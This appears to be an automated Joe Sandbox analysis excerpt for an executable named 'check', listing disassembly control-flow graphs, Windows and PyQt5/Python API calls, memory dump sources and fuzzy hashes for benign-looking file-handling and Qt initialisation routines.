                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                • Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                • Instruction ID: be65ab544959314bfaad0b304b823912db506a86f9e4606c85ed562c4079338d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C329121A0C68295FB15DB24E4553B96651AF4E74CFA4C0B2DA5FC32F6EF2CE968C304

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 629 7ff60b146964-7ff60b1469d7 call 7ff60b146698 632 7ff60b1469d9-7ff60b1469e2 call 7ff60b134ee8 629->632 633 7ff60b1469f1-7ff60b1469fb call 7ff60b138520 629->633 638 7ff60b1469e5-7ff60b1469ec call 7ff60b134f08 632->638 639 7ff60b146a16-7ff60b146a7f CreateFileW 633->639 640 7ff60b1469fd-7ff60b146a14 call 7ff60b134ee8 call 7ff60b134f08 633->640 653 7ff60b146d32-7ff60b146d52 638->653 641 7ff60b146afc-7ff60b146b07 GetFileType 639->641 642 7ff60b146a81-7ff60b146a87 639->642 640->638 648 7ff60b146b09-7ff60b146b44 GetLastError call 7ff60b134e7c CloseHandle 641->648 649 7ff60b146b5a-7ff60b146b61 641->649 645 7ff60b146ac9-7ff60b146af7 GetLastError call 7ff60b134e7c 642->645 646 7ff60b146a89-7ff60b146a8d 642->646 645->638 646->645 651 7ff60b146a8f-7ff60b146ac7 CreateFileW 646->651 648->638 664 7ff60b146b4a-7ff60b146b55 call 7ff60b134f08 648->664 656 7ff60b146b69-7ff60b146b6c 649->656 657 7ff60b146b63-7ff60b146b67 649->657 651->641 651->645 658 7ff60b146b6e 656->658 659 7ff60b146b72-7ff60b146bc7 call 7ff60b138438 656->659 657->659 658->659 667 7ff60b146bc9-7ff60b146bd5 call 7ff60b1468a0 659->667 668 7ff60b146be6-7ff60b146c17 call 7ff60b146418 659->668 664->638 667->668 674 7ff60b146bd7 667->674 675 7ff60b146c19-7ff60b146c1b 668->675 676 7ff60b146c1d-7ff60b146c5f 668->676 679 7ff60b146bd9-7ff60b146be1 call 7ff60b13aac0 674->679 675->679 677 7ff60b146c81-7ff60b146c8c 676->677 678 7ff60b146c61-7ff60b146c65 676->678 681 7ff60b146d30 677->681 682 7ff60b146c92-7ff60b146c96 677->682 678->677 680 7ff60b146c67-7ff60b146c7c 678->680 679->653 680->677 681->653 682->681 684 7ff60b146c9c-7ff60b146ce1 CloseHandle CreateFileW 682->684 686 7ff60b146d16-7ff60b146d2b 684->686 687 7ff60b146ce3-7ff60b146d11 GetLastError call 7ff60b134e7c call 7ff60b138660 684->687 686->681 687->686
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                • Instruction ID: 5f24781cbd8615d070b26b926117507346cd883c58fdeaade27111641fc32d48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AC1BE32B28A4285EB10CFA9D4902AD3761EB4EBACB258275DA1FD77E4DF38D455C300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                • Instruction ID: d49e4c59db592fcf98b51664d96f88d779706a2386861e3af167b6e00e7a6ace
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF0C822A1C74186F7608F64B4887667350EB8976CF144335DAAFC26E4DF3CE459CA04

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 7ffb03061470-7ffb030614c1 call 7ffb03055b00 call 7ffb0305a180 8 7ffb030614d1-7ffb030614ea PyDict_SetItemString 0->8 9 7ffb030614c3-7ffb030614d0 Py_FatalError 0->9 10 7ffb030614ec-7ffb030614f9 Py_FatalError 8->10 11 7ffb030614fa-7ffb03061501 call 7ffb0305b0f0 8->11 9->8 10->11 14 7ffb03061511-7ffb0306152a PyDict_SetItemString 11->14 15 7ffb03061503-7ffb03061510 Py_FatalError 11->15 16 7ffb0306152c-7ffb03061539 Py_FatalError 14->16 17 7ffb0306153a-7ffb03061541 call 7ffb03058400 14->17 15->14 16->17 20 7ffb03061551-7ffb0306156a PyDict_SetItemString 17->20 21 7ffb03061543-7ffb03061550 Py_FatalError 17->21 22 7ffb0306156c-7ffb03061579 Py_FatalError 20->22 23 7ffb0306157a-7ffb03061581 call 7ffb03058fd0 20->23 21->20 22->23 26 7ffb03061591-7ffb030615b6 ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z 23->26 27 7ffb03061583-7ffb03061590 Py_FatalError 23->27 28 7ffb030615d8-7ffb030615e2 26->28 29 7ffb030615b8-7ffb030615d2 call 7ffb0304ee40 26->29 27->26 31 7ffb030615ee-7ffb0306160f ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z 28->31 32 7ffb030615e4-7ffb030615ec ?registerNormalizedTypedef@QMetaType@@SAHAEBVQByteArray@@H@Z 28->32 29->28 34 7ffb03061615-7ffb03061643 ??1QByteArray@@QEAA@XZ ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z 31->34 32->34 35 7ffb03061665-7ffb0306166d 34->35 36 7ffb03061645-7ffb0306165f call 7ffb0304ee40 34->36 38 7ffb0306166f-7ffb03061677 ?registerNormalizedTypedef@QMetaType@@SAHAEBVQByteArray@@H@Z 35->38 39 7ffb03061679-7ffb0306169a ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z 35->39 36->35 41 7ffb030616a0-7ffb030616e3 ??1QByteArray@@QEAA@XZ ?registerStreamOperators@QMetaType@@SAXPEBDP6AXAEAVQDataStream@@PEBX@ZP6AX1PEAX@Z@Z 38->41 39->41 43 7ffb030616f3-7ffb0306170a PyUnicode_FromString 41->43 44 7ffb030616e5-7ffb030616f2 Py_FatalError 41->44 45 7ffb0306170c-7ffb03061719 Py_FatalError 43->45 46 7ffb0306171a-7ffb03061731 PyUnicode_FromString 43->46 44->43 45->46 47 7ffb03061741-7ffb03061758 PyUnicode_FromString 46->47 48 7ffb03061733-7ffb03061740 Py_FatalError 46->48 49 7ffb03061768-7ffb03061774 PyDict_New 47->49 50 7ffb0306175a-7ffb03061767 Py_FatalError 47->50 48->47 51 7ffb03061784-7ffb03061797 PyUnicode_FromString 49->51 52 7ffb03061776-7ffb03061783 Py_FatalError 49->52 50->49 53 7ffb030617a7-7ffb030617bc PyDict_SetItemString 51->53 54 7ffb03061799-7ffb030617a6 Py_FatalError 51->54 52->51 55 7ffb030617cc-7ffb030617d0 53->55 56 7ffb030617be-7ffb030617cb Py_FatalError 53->56 54->53 57 7ffb030617d2-7ffb030617d5 _Py_Dealloc 55->57 58 7ffb030617db-7ffb030617f0 PyDict_SetItemString 55->58 56->55 57->58 59 7ffb03061800-7ffb03061804 58->59 60 7ffb030617f2-7ffb030617ff Py_FatalError 58->60 61 7ffb0306180f-7ffb0306182e call 7ffb03062300 ??0QMutex@@QEAA@W4RecursionMode@0@@Z call 7ffb0305f570 59->61 62 7ffb03061806-7ffb03061809 _Py_Dealloc 59->62 60->59 66 7ffb03061833-7ffb03061835 61->66 62->61 67 7ffb03061837-7ffb03061844 Py_FatalError 66->67 68 7ffb03061845-7ffb03061854 66->68 67->68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFatal$Meta$String$Array@@Byte$Dict_$?registerFromItemType@@$NormalizedType@Unicode_$Object@@$?normalizedDeallocFlag@Flags@Object@@@TypeType@@@@Typedef@$DataMode@0@@Mutex@@Operators@RecursionSpecStreamStream@@Type_V0@@
                                                                                                                                                                                                                • String ID: -n PyQt5.sip -t Qt_5_15_2 -t WS_WIN$PYQT_CONFIGURATION$PyQt5.QtCore: Failed to create PYQT_CONFIGURATION dict$PyQt5.QtCore: Failed to create PYQT_CONFIGURATION.sip_flags$PyQt5.QtCore: Failed to initialise pyqtBoundSignal type$PyQt5.QtCore: Failed to initialise pyqtMethodProxy type$PyQt5.QtCore: Failed to initialise pyqtProperty type$PyQt5.QtCore: Failed to initialise pyqtSignal type$PyQt5.QtCore: Failed to objectify '__mro__'$PyQt5.QtCore: Failed to objectify '__name__'$PyQt5.QtCore: Failed to objectify '__pyqtSignature__'$PyQt5.QtCore: Failed to register attribute getter$PyQt5.QtCore: Failed to set PYQT_CONFIGURATION dict$PyQt5.QtCore: Failed to set PYQT_CONFIGURATION.sip_flags$PyQt5.QtCore: Failed to set pyqtBoundSignal type$PyQt5.QtCore: Failed to set pyqtProperty type$PyQt5.QtCore: Failed to set pyqtSignal type$PyQt5.QtCore: Unable to embed qt.conf$PyQt_PyObject$__mro__$__name__$__pyqtSignature__$pyqtBoundSignal$pyqtProperty$pyqtSignal$sip_flags
                                                                                                                                                                                                                • API String ID: 717027647-3785846145
                                                                                                                                                                                                                • Opcode ID: 831652dc059fab9ff006403ef15df6b3f7b881e9c77081f21788e795f0556241
                                                                                                                                                                                                                • Instruction ID: bca52a50856aa4ea75208676a358ea95e0483266f15431101fc790e071d71e5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 831652dc059fab9ff006403ef15df6b3f7b881e9c77081f21788e795f0556241
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1B119F0E0AA0795EA04EB34F85CBB92361AF45B55F4C0535C91E726A8FF6DE589C308

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 69 7ffb03056000-7ffb03056011 70 7ffb03056017-7ffb03056038 PyErr_Fetch 69->70 71 7ffb0305638a-7ffb03056391 69->71 72 7ffb0305604e-7ffb03056062 PySys_GetObject 70->72 73 7ffb0305603a-7ffb03056047 PySys_GetObject 70->73 74 7ffb03056097-7ffb030560ac 72->74 75 7ffb03056064-7ffb03056096 PyErr_Restore PyErr_Print 72->75 73->72 76 7ffb030560ae-7ffb030560c1 PyImport_ImportModule 74->76 77 7ffb030560e9-7ffb030560f2 74->77 76->77 78 7ffb030560c3-7ffb030560de PyObject_GetAttrString 76->78 79 7ffb03056159 77->79 80 7ffb030560f4-7ffb03056107 PySys_GetObject 77->80 78->77 82 7ffb030560e0-7ffb030560e3 _Py_Dealloc 78->82 81 7ffb03056161-7ffb030561a3 PyErr_Restore PyErr_Print ??0QByteArray@@QEAA@PEBDH@Z 79->81 80->81 83 7ffb03056109-7ffb0305611e PyObject_CallObject 80->83 84 7ffb0305631f-7ffb03056383 PyEval_SaveThread ?data@QByteArray@@QEAAPEADXZ ??0QMessageLogger@@QEAA@PEBDH0@Z ?fatal@QMessageLogger@@QEBAXPEBDZZ PyEval_RestoreThread ??1QByteArray@@QEAA@XZ 81->84 85 7ffb030561a9-7ffb030561c2 PySys_SetObject 81->85 82->77 83->81 86 7ffb03056120-7ffb03056135 PySys_SetObject 83->86 84->71 88 7ffb030561cd-7ffb030561e6 PyObject_CallMethod 85->88 89 7ffb030561c4-7ffb030561c7 _Py_Dealloc 85->89 86->81 87 7ffb03056137-7ffb0305613b 86->87 90 7ffb0305613d-7ffb03056140 _Py_Dealloc 87->90 91 7ffb03056146-7ffb0305614a 87->91 92 7ffb0305630b-7ffb03056314 88->92 93 7ffb030561ec-7ffb0305620a PyObject_CallMethod 88->93 89->88 90->91 94 7ffb0305614c-7ffb0305614f _Py_Dealloc 91->94 95 7ffb03056155-7ffb03056157 91->95 92->84 96 7ffb03056316-7ffb03056319 _Py_Dealloc 92->96 97 7ffb0305620c-7ffb03056210 93->97 98 7ffb0305621e-7ffb03056234 PyObject_GetAttrString 93->98 94->95 95->81 96->84 99 7ffb03056212-7ffb03056215 _Py_Dealloc 97->99 100 7ffb0305621b 97->100 101 7ffb030562f7-7ffb03056300 98->101 102 7ffb0305623a-7ffb0305624e PyUnicode_AsUTF8String 98->102 99->100 100->98 101->92 105 7ffb03056302-7ffb03056305 _Py_Dealloc 101->105 103 7ffb030562e2-7ffb030562ec 102->103 104 7ffb03056254-7ffb0305627b PyBytes_AsString PyUnicode_AsEncodedString 102->104 103->101 108 7ffb030562ee-7ffb030562f1 _Py_Dealloc 103->108 106 7ffb0305627d-7ffb030562c3 PyBytes_Size PyBytes_AsString ??0QByteArray@@QEAA@PEBDH@Z ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z ??1QByteArray@@QEAA@XZ 104->106 107 7ffb030562ce-7ffb030562d7 104->107 105->92 106->107 109 7ffb030562c5-7ffb030562c8 _Py_Dealloc 106->109 107->103 110 7ffb030562d9-7ffb030562dc _Py_Dealloc 107->110 108->101 109->107 110->103
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Array@@ByteObjectString$Err_Object_Sys_$Bytes_CallRestore$AttrEval_Logger@@MessageMethodPrintThreadUnicode_$?data@?fatal@EncodedFetchImportImport_ModuleSaveSizeV0@$$V0@@
                                                                                                                                                                                                                • String ID: StringIO$Unhandled Python exception$__excepthook__$encoding$excepthook$getvalue$stderr$strict$strip
                                                                                                                                                                                                                • API String ID: 2896962016-3634559486
                                                                                                                                                                                                                • Opcode ID: 19a567b24dda67e0f75ca5cf4663bf59646769faa99cc04d6e5945e455d8b8f6
                                                                                                                                                                                                                • Instruction ID: 903e338ad8d9b6ae98b4dd792a39109762828dde150d57d0e1bf13f513519e6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19a567b24dda67e0f75ca5cf4663bf59646769faa99cc04d6e5945e455d8b8f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0A132E5A0AA4686EA509B35E81CB7A23A1FF45B91F4C5035C94E36768FF3DE448C708

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 380 7ffb0305f570-7ffb0305f58a PyImport_ImportModule 381 7ffb0305f590-7ffb0305f5a7 PyObject_GetAttrString 380->381 382 7ffb0305f78e-7ffb0305f796 380->382 383 7ffb0305f5b2-7ffb0305f5b5 381->383 384 7ffb0305f5a9-7ffb0305f5ac _Py_Dealloc 381->384 383->382 385 7ffb0305f5bb-7ffb0305f5cc call 7ffb0305f2f0 383->385 384->383 388 7ffb0305f5ce-7ffb0305f5d1 _Py_Dealloc 385->388 389 7ffb0305f5d7-7ffb0305f5e0 385->389 388->389 390 7ffb0305f5e2-7ffb0305f5f8 ??1QString@@QEAA@XZ 389->390 391 7ffb0305f5f9-7ffb0305f6b3 ?fromNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z ??0QFileInfo@@QEAA@AEBVQString@@@Z ?absoluteDir@QFileInfo@@QEBA?AVQDir@@XZ ??1QFileInfo@@QEAA@XZ ??1QString@@QEAA@XZ ??0QString@@QEAA@VQLatin1String@@@Z ?absoluteFilePath@QDir@@QEBA?AVQString@@AEBV2@@Z ??1QString@@QEAA@XZ ??0QFileInfo@@QEAA@AEBVQString@@@Z ?exists@QFileInfo@@QEBA_NXZ ??1QFileInfo@@QEAA@XZ 389->391 392 7ffb0305f761-7ffb0305f78d ??1QString@@QEAA@XZ ??1QDir@@QEAA@XZ ??1QString@@QEAA@XZ 391->392 393 7ffb0305f6b9-7ffb0305f6da 391->393 394 7ffb0305f6e0-7ffb0305f717 ?prepend@QByteArray@@QEAAAEAV1@PEBD@Z ?append@QByteArray@@QEAAAEAV1@PEBD@Z 393->394 395 7ffb0305f797-7ffb0305f7aa call 7ffb0306283c 393->395 396 7ffb0305f720-7ffb0305f737 ?prepend@QByteArray@@QEAAAEAV1@D@Z 394->396 395->394 400 7ffb0305f7b0-7ffb0305f7da ?toLatin1@QString@@QEGBA?AVQByteArray@@XZ call 7ffb030627b8 call 7ffb030627d0 395->400 396->396 398 7ffb0305f739-7ffb0305f75c ?constData@QByteArray@@QEBAPEBDXZ ?qRegisterResourceData@@YA_NHPEBE00@Z 396->398 398->392 400->394
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PyImport_ImportModule.PYTHON3 ref: 00007FFB0305F57E
                                                                                                                                                                                                                • PyObject_GetAttrString.PYTHON3 ref: 00007FFB0305F59A
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON3 ref: 00007FFB0305F5AC
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON3 ref: 00007FFB0305F5D1
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFB0305F5E9
                                                                                                                                                                                                                • ?fromNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FFB0305F603
                                                                                                                                                                                                                • ??0QFileInfo@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FFB0305F611
                                                                                                                                                                                                                • ?absoluteDir@QFileInfo@@QEBA?AVQDir@@XZ.QT5CORE ref: 00007FFB0305F61F
                                                                                                                                                                                                                • ??1QFileInfo@@QEAA@XZ.QT5CORE ref: 00007FFB0305F62A
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFB0305F635
                                                                                                                                                                                                                • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F664
                                                                                                                                                                                                                • ?absoluteFilePath@QDir@@QEBA?AVQString@@AEBV2@@Z.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F679
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F684
                                                                                                                                                                                                                • ??0QFileInfo@@QEAA@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F694
                                                                                                                                                                                                                • ?exists@QFileInfo@@QEBA_NXZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F69D
                                                                                                                                                                                                                • ??1QFileInfo@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F6AB
                                                                                                                                                                                                                • ?prepend@QByteArray@@QEAAAEAV1@PEBD@Z.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F6EE
                                                                                                                                                                                                                • ?append@QByteArray@@QEAAAEAV1@PEBD@Z.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F702
                                                                                                                                                                                                                • ?prepend@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F72A
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F740
                                                                                                                                                                                                                • ?qRegisterResourceData@@YA_NHPEBE00@Z.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F75C
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F768
                                                                                                                                                                                                                • ??1QDir@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F773
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F77E
                                                                                                                                                                                                                • ?toLatin1@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE(?,?,?,?,?,00000000,00007FFB03061833), ref: 00007FFB0305F7BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
